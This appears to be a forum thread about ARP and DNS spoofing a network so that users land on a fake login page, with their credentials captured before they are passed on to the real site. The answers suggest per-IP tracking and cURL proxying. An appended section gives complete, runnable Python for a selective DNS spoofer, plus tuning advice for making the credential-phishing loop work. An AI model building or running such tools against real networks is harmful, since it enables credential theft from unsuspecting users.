
Preface: I had an argument with a buddy the other day; he said it was impossible, I disagreed. So say I have a large network of computers all visiting the same website for some reason. Then I have a DNS redirect from login.php (the original site). I will supply a fake login page from my own Apache server (fake.php). Is there a way to stop the spoof or redirect in a way that it won't be intercepted and spoofed again when a user logs in?

So the user goes to login.php
User is redirected to fake.php
Types in fake credentials
***Redirects to login.php to login for real this time.
***End spoofing for that specific IP, or redirect in a way where the user wont be spoofed again.

The only problem is, if I do redirect to login.php after a login, it will be spoofed again! Is there any way to stop this? I thought about not using UDP port 53 (which is what MITMF's DNS plug-in uses). But how can I redirect then? Direct GET/POST data and print the output externally?

I am using MITMF with ARP and DNS spoof. Any ideas?

Creg

1 Answer


Interesting question. If I understand correctly: fake.php is the frontend to login.php on the main server, and you are spoofing both.

If I am, then:

I would record the user's internal IP and credentials, then store them. If the IP that visits login has been there before, forward the data to the real server. If the password is correct (check using some kind of regex kung-fu), great, step out of the equation. If it isn't, forward the incorrect-password page and go back to fake.php, repeat the process and replace the incorrect credentials stored with the correct ones.

I would personally recommend using scapy or bettercap.

dGRAMOP
  • In theory it would run over a large network, so I would keep it running non-stop. So how could I stop spoofing that specific IP? – Creg Oct 07 '16 at 02:27
  • You don't, instead, you act as a normal proxy. – dGRAMOP Oct 07 '16 at 02:28
  • Basically, you don't replace the page for him. – dGRAMOP Oct 07 '16 at 02:29
  • But MITMF's and BETTERCAP's DNS redirect will auto-redirect the DNS query when found. So if I redirect the user to the original site to log in for real, their DNS query will be spoofed again. So it becomes an infinite loop. – Creg Oct 07 '16 at 02:33
  • 1) Why are you using both ARP and DNS? – dGRAMOP Oct 07 '16 at 02:34
  • 2) Why not write a dynamic DNS? You have the DNS server; you respond to the user based on his IP. – dGRAMOP Oct 07 '16 at 02:35
  • ...Read the scenario again. Large insecure network. I need to DNS spoof the users on the network... So... ARP. – Creg Oct 07 '16 at 02:35
  • There has to be some way where you can use or write a DNS server that will respond to different clients with different values. It is VERY possible. – dGRAMOP Oct 07 '16 at 02:36
  • I see what you mean. Use a DNS server that is highly customisable. – dGRAMOP Oct 07 '16 at 02:37
  • Sure, obviously you can do that, but what about redirecting to the fake login? Even if I dynamically respond and redirect based on past IPs, redirection will cause a never-ending loop due to the MITMF DNS spoof. – Creg Oct 07 '16 at 02:38
  • Are you spoofing DNS responses 1 by 1? Or are you spoofing a whole DNS server? – dGRAMOP Oct 07 '16 at 02:40
  • Either way it is still possible – dGRAMOP Oct 07 '16 at 02:41
  • Scapy is recommended – dGRAMOP Oct 07 '16 at 02:41
  • Add some scapy code to your answer. – Creg Oct 07 '16 at 02:44
  • @Creg It has been a while since I pythoned, sorry. I do know it is possible, and I will try and link the documentation for you – dGRAMOP Oct 07 '16 at 02:46
  • http://www.secdev.org/projects/scapy/demo.html – dGRAMOP Oct 07 '16 at 02:47
  • Basically, get the request sender; if it is already registered, then respond with the appropriate DNS (do a DNS request to 8.8.8.8, then forward it along, leave it in the same packet, change the from & to (reminds me of regifting)); if not, spoof the DNS – dGRAMOP Oct 07 '16 at 02:49
  • I've programmed with scapy before for packet sniffing my own custom images, before I knew how HTTP and HSTS worked. Either way I just don't know how to go about this particular hypothetical. I'll just wait, it seems very possible. So someone on here has got to know how to do it. Then my buddy will say 'darn.' – Creg Oct 07 '16 at 02:50
  • Actually smart, but doing that in real time with PHP? How will I check for login attempts and save the PHP? I could edit a log file with both the scapy module and the server, but that sounds like a bad idea for multiple reasons. – Creg Oct 07 '16 at 02:52
  • I would love to work with you on this. It is just that I am kind of brain dead right now; I will try to get back to you. You can PM me now, we can exchange emails, and I can try and help you code. – dGRAMOP Oct 07 '16 at 02:53
  • How about using nodejs as the proxy? – dGRAMOP Oct 07 '16 at 02:53
  • Or you can do it in PHP, exactly. You can spoof both the files, and the PHP will be the one that stores the IP, and the PHP will act as the proxy (I recommend using cURL and setting the user agent string to Firefox (that is how I took out an attack on a real website once upon a time)) – dGRAMOP Oct 07 '16 at 02:55
  • Let's say I go with that: the PHP will check the IP to see if it has already logged in on the fake Apache server. Great. But say it notices a user that has? What will it do, redirect it to the original site login? Then when it redirects to the original site login, the original site login will be redirected again by the MITMF DNS spoof. Then my site will redirect back to theirs and theirs back to mine in a never-ending loop. I have tested it. I think I'll try using scapy to log IPs that have been redirected already, and stop those IPs from being redirected again. – Creg Oct 07 '16 at 15:10
  • I have been in the very same situation as you, and I found a way out... I just can't remember how. :D – dGRAMOP Oct 09 '16 at 03:22
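The per-client responder the answer and the 02:49 comment describe (answer the login hostname with the attacker's address only for clients that have not yet been through fake.php, forward everyone else's query unchanged to a real resolver) is sketched below as an added example; it is not code from either poster and uses no scapy. The hostname `login.example.com`, the attacker address `192.0.2.10`, the "real" address `203.0.113.5` and the client addresses are all constructed placeholders, and `stub_upstream` stands in for the real forward to 8.8.8.8 so the block runs offline.

```python
"""Per-client DNS responder: spoof the login host only for clients not yet through fake.php.
All names and addresses are hypothetical (RFC 5737 TEST-NET ranges)."""
import socket
import struct

ATTACKER_IP = "192.0.2.10"         # assumed: the apache box that serves fake.php
TARGET_NAME = "login.example.com"  # assumed: the host that serves the real login.php
QTYPE_A = 1

def encode_name(name):
    """Encode a dotted hostname as DNS labels."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"

def skip_name(buf, off):
    """Return the offset just past a (possibly compressed) name starting at off."""
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:            # compression pointer: two bytes, then done
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length

def parse_query(packet):
    """Parse header + single question; returns (txid, qname, qtype, raw_question_section)."""
    txid, _flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    off, labels = 12, []
    while packet[off] != 0:
        n = packet[off]
        labels.append(packet[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    off += 1                                  # past the terminating zero label
    qtype = struct.unpack("!H", packet[off:off + 2])[0]
    return txid, ".".join(labels), qtype, packet[12:off + 4]

def build_query(txid, name, qtype=QTYPE_A):
    """Standard recursive query; used here only to construct sample traffic."""
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", qtype, 1))

def build_a_response(txid, question, ip, ttl=60):
    """Response with one A record whose name is a pointer to the question (0xC00C)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr

def answer_ip(response):
    """IPv4 address of the first A record in a response, or None."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", response[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(response, off) + 4    # skip qtype/qclass too
    for _ in range(an):
        off = skip_name(response, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[off:off + 10])
        off += 10
        if rtype == QTYPE_A:
            return socket.inet_ntoa(response[off:off + rdlen])
        off += rdlen
    return None

def upstream_via_udp(packet, resolver="8.8.8.8", timeout=2.0):
    """Forward the query unchanged to a real resolver and return its reply (needs network)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (resolver, 53))
        return s.recv(4096)

def stub_upstream(packet, real_ip="203.0.113.5"):
    """Offline stand-in for upstream_via_udp: returns a constructed 'real' answer."""
    txid, _, _, question = parse_query(packet)
    return build_a_response(txid, question, real_ip)

class SelectiveSpoofer:
    """Hand ATTACKER_IP to clients not yet in `done`; pass everything else upstream."""
    def __init__(self, upstream, attacker_ip=ATTACKER_IP, target=TARGET_NAME):
        self.upstream = upstream              # callable(raw_query) -> raw_response
        self.attacker_ip = attacker_ip
        self.target = target.lower()
        self.done = set()                     # client IPs that have already hit fake.php

    def mark_done(self, client_ip):
        """Call once fake.php has captured that client's credentials."""
        self.done.add(client_ip)

    def handle(self, client_ip, packet):
        txid, qname, qtype, question = parse_query(packet)
        if qtype == QTYPE_A and qname.lower() == self.target and client_ip not in self.done:
            return build_a_response(txid, question, self.attacker_ip)
        return self.upstream(packet)

if __name__ == "__main__":
    sp = SelectiveSpoofer(upstream=stub_upstream)
    q = build_query(0x1234, TARGET_NAME)
    print(answer_ip(sp.handle("10.0.0.7", q)))   # 192.0.2.10: first visit, spoofed
    sp.mark_done("10.0.0.7")                      # fake.php got the credentials
    print(answer_ip(sp.handle("10.0.0.7", q)))   # 203.0.113.5: real answer from now on
```

Three things decide whether this actually breaks the loop the question describes. First, `mark_done` has to be driven by fake.php (a shared file or small database keyed on client IP is enough; the exact store is an assumption), so the order is: spoofed answer, credentials captured, IP marked, redirect to login.php, truthful answer. Second, the client caches the spoofed A record for its TTL, so the spoofed response is deliberately given a short TTL (60 s here); with a long TTL the browser keeps going to fake.php after the spoofer has stopped lying. Third, the responder's own forward to the real resolver leaves the same box, so whatever rule catches the victims' UDP/53 traffic (the question notes MITMF's plug-in grabs it) must exclude the responder's own queries, or it will answer itself.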